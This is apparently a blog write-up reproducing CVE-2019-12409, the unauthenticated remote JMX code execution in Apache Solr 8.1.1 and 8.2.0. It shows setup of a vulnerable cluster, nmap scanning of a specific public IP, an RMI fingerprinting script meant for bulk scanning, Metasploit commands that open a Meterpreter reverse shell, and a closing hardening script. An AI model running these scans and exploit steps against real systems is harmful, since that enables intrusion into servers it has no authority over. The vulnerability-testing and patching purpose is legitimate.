Apache Solr JMX service RCE, hands-on test of CVE-2019-12409

Download

wget http://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip

Extract

unzip solr-8.2.0.zip

cd solr-8.2.0

Start the SolrCloud example (the -force flag is required when running as root):

./bin/solr start -e cloud -force

Just press Enter at the following 3 prompts:
number of nodes (default 2), port of the first node (default 8983), port of the second node (default 7574)

To begin, how many Solr nodes would you like to run in your local cluster? (specify 1-4 nodes) [2]:  

Ok, let's start up 2 Solr nodes for your example SolrCloud cluster.
Please enter the port for node1 [8983]: 

Please enter the port for node2 [7574]: 


When the following prompt appears, type techproducts and press Enter:

Now let's create a new collection for indexing documents in your 2-node cluster.
Please provide a name for your new collection: [gettingstarted] 


Press Enter at these two as well (split the techproducts index into 2 shards across the 2 nodes, and create 2 replicas of each shard):

How many shards would you like to split techproducts into? [2]
How many replicas per shard would you like to create? [2]


When the following prompt appears, type sample_techproducts_configs and press Enter:

Please choose a configuration for the techproducts collection, available options are:
_default or sample_techproducts_configs [_default]


The collection is then created; the following output means it succeeded:

SolrCloud example running, please visit: http://localhost:8983/solr 


Open the admin UI at http://vps:8983/solr


nmap -p 18983 116.255.218.147 -sT -sV

This confirms the JMX service is listening. In Solr 8.1.1 and 8.2.0 the shipped bin/solr.in.sh sets ENABLE_REMOTE_JMX_OPTS="true", which starts an unauthenticated JMX connector over Java RMI on RMI_PORT (SOLR_PORT+10000, so 18983 for the default port 8983); that default is what CVE-2019-12409 describes. Oddly, nmap could not tell what service this is, so for bulk scanning a way to fingerprint it still has to be worked out. Since JMX rides on Java RMI, a JRMI handshake probe (or nmap's rmi-dumpregistry NSE script, which dumps the registry bindings and shows the jmxrmi entry) will identify it.
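The fingerprint that the nmap scan above did not produce can be obtained with a few bytes of the RMI wire protocol: send the JRMI stream-protocol greeting and check for the server's ProtocolAck. The script below is an added example, not code from the original post or from the Solr project; the loopback responder it starts for the offline demo is a constructed stand-in for a Solr node, and the host/port arguments on the command line are the only things it assumes about a real target.

```python
"""Fingerprint a Java RMI endpoint by completing only the JRMI handshake.

Added example, not code from the original post. Solr's remote JMX connector
is JMX-over-RMI, so a port that answers the JRMI greeting with a ProtocolAck
is what the post's nmap run failed to label. The responder below is a
constructed stand-in for a Solr node so the script runs offline.
"""
import socket
import struct
import sys
import threading

# Client -> server: magic "JRMI", protocol version 2, StreamProtocol (0x4b).
JRMI_HANDSHAKE = b"JRMI" + struct.pack(">HB", 2, 0x4B)
# Server -> client: ProtocolAck byte, then writeUTF(client host) and
# writeInt(client port) as the server sees them.
PROTOCOL_ACK = 0x4E


def parse_protocol_ack(data: bytes):
    """Return (host, port) from a JRMI ProtocolAck, or None when the bytes are
    not one (wrong leading byte, or too short to hold the host/port)."""
    if len(data) < 3 or data[0] != PROTOCOL_ACK:
        return None
    (hlen,) = struct.unpack(">H", data[1:3])
    if len(data) < 3 + hlen + 4:
        return None
    host = data[3:3 + hlen].decode("utf-8", errors="replace")
    (port,) = struct.unpack(">i", data[3 + hlen:3 + hlen + 4])
    return host, port


def probe_rmi(host: str, port: int, timeout: float = 3.0):
    """Connect, send the JRMI greeting and return the parsed ProtocolAck, or
    None when the peer is not a Java RMI endpoint (no reply, or another
    protocol such as HTTP answering instead)."""
    data = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(JRMI_HANDSHAKE)
            while len(data) < 1024:          # the ack may arrive in pieces
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
                ack = parse_protocol_ack(data)
                if ack is not None:
                    return ack
    except OSError:                          # refused, reset or timed out
        pass
    return parse_protocol_ack(data)


def _fake_rmi_responder(srv: socket.socket) -> None:
    """Constructed stand-in for a Solr node's RMI port: on a correct greeting
    it replies exactly as a JRMI stream endpoint does."""
    conn, (chost, cport) = srv.accept()
    with conn, srv:
        if conn.recv(len(JRMI_HANDSHAKE)) == JRMI_HANDSHAKE:
            h = chost.encode()
            conn.sendall(bytes([PROTOCOL_ACK]) + struct.pack(">H", len(h))
                         + h + struct.pack(">i", cport))


def demo():
    """Start the stand-in on a random loopback port and probe it."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    threading.Thread(target=_fake_rmi_responder, args=(srv,), daemon=True).start()
    return probe_rmi("127.0.0.1", port)


if __name__ == "__main__":
    if len(sys.argv) == 3:                   # python probe.py <host> <port>
        print("JRMI ack:", probe_rmi(sys.argv[1], int(sys.argv[2])))
    else:
        print("offline demo:", demo())
```

A ProtocolAck proves only that the port speaks Java RMI; telling the JMX connector apart from any other RMI registry needs a registry lookup for the jmxrmi name, which is what the nmap script does on top of this handshake.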


Next, use the Metasploit exploit to execute commands remotely. The module registers a javax.management.loading.MLet MBean and makes the target JVM load a jar from the module's own HTTP server (SRVHOST/SRVPORT), so the Solr host must be able to connect back to the attacker; 127.0.0.1 only works here because the test runs on the same machine, otherwise set LHOST and SRVHOST to an address the target can reach.

msfconsole
use exploit/multi/misc/java_jmx_server
set RHOST 127.0.0.1
set RPORT 18983

set payload java/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
run


Got a shell:

 
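The fix for an instance like this one is to turn the setting off in bin/solr.in.sh (or firewall the RMI port to trusted hosts) and restart Solr. The script below, an added example that is neither the post's nor the Solr project's code, audits a solr.in.sh for the effective ENABLE_REMOTE_JMX_OPTS and RMI_PORT values and emits a hardened copy; it assumes what bin/solr does with these variables, namely that the last uncommented assignment wins and that RMI_PORT falls back to SOLR_PORT+10000, and the excerpt it audits is constructed, not the real shipped file.

```python
"""Audit a Solr bin/solr.in.sh for the CVE-2019-12409 setting and emit a
hardened copy.

Added example, not from the original post or the Solr project. Assumes the
behaviour of bin/solr for these variables: the last uncommented assignment
wins, and RMI_PORT falls back to SOLR_PORT+10000 (8983+10000 = 18983).
"""
import re
import sys

# VAR=value, VAR="value", optional leading export, optional trailing comment.
_ASSIGN = re.compile(r'^\s*(?:export\s+)?([A-Z_][A-Z0-9_]*)=\s*"?([^"#]*?)"?\s*(?:#.*)?$')


def effective_vars(text: str) -> dict:
    """Return the effective value of every VAR=... line, ignoring comments."""
    found = {}
    for line in text.splitlines():
        m = _ASSIGN.match(line)
        if m:
            found[m.group(1)] = m.group(2).strip()
    return found


def audit(text: str) -> dict:
    """Report whether remote JMX is enabled and on which RMI port."""
    v = effective_vars(text)
    enabled = v.get("ENABLE_REMOTE_JMX_OPTS", "false").lower() == "true"
    solr_port = int(v.get("SOLR_PORT") or 8983)
    rmi_port = int(v["RMI_PORT"]) if v.get("RMI_PORT") else solr_port + 10000
    return {"remote_jmx_enabled": enabled, "rmi_port": rmi_port}


def harden(text: str) -> str:
    """Rewrite every uncommented ENABLE_REMOTE_JMX_OPTS assignment to "false"
    and leave everything else (comments included) untouched."""
    out = []
    for line in text.splitlines():
        m = _ASSIGN.match(line)
        if m and m.group(1) == "ENABLE_REMOTE_JMX_OPTS":
            line = 'ENABLE_REMOTE_JMX_OPTS="false"'
        out.append(line)
    return "\n".join(out) + "\n"


# Constructed excerpt in the shape of the 8.2.0 file; not the real file.
VULNERABLE_SOLR_IN_SH = """\
# SOLR_PORT=8983
# Enable remote JMX access by uncommenting the property below.
ENABLE_REMOTE_JMX_OPTS="true"
# The script will use SOLR_PORT+10000 for the RMI_PORT or you
# can set what port you want to use by uncommenting and updating the value below
# RMI_PORT=18983
"""

if __name__ == "__main__":
    # python audit_solr_in_sh.py [path/to/solr.in.sh]; no path uses the excerpt
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else VULNERABLE_SOLR_IN_SH
    print("before:", audit(text))
    print("after: ", audit(harden(text)))
```

Running it without arguments prints that the excerpt exposes JMX on 18983 and that the hardened copy does not; on a real file, write the hardened text back and restart the node, then re-run the nmap check above to confirm the port is closed.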

Posted 2021-02-23 19:27 by 妇愁者纞萌